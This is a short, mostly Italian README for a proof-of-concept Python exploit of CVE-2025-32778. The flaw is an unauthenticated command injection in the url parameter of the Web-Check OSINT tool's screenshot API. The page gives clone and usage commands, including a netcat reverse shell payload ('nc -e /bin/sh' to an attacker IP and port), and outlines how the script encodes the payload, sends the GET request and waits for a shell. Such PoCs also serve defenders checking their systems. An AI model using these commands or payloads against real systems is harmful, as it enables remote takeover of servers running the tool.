
PoC exploit for CVE-2025-32778: command injection in Web-Check OSINT tool
CVE-2025-32778 è una vulnerabilità critica di iniezione di comandi nello strumento OSINT Web-Check di Lissy93.
Consente a un aggressore non autenticato di eseguire comandi di sistema arbitrari tramite il parametro url nell'API degli screenshot.
Questo script Python automatizza lo sfruttamento e può generare reverse shell o accettare payload shell personalizzati.
url in Web-Check.--lhost e --lport.--shell.--shell con --lhost/--lport.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
Normalizza l'URL target in scheme://host[:port].
Prepara il payload:
--lhost e --lport.--shell.Codifica il payload della shell per un'iniezione URL sicura.
Invia una richiesta HTTP GET a /api/screenshot/ con il payload.
Attendi la connessione della reverse shell.
00xCanelo
Profilo GitHub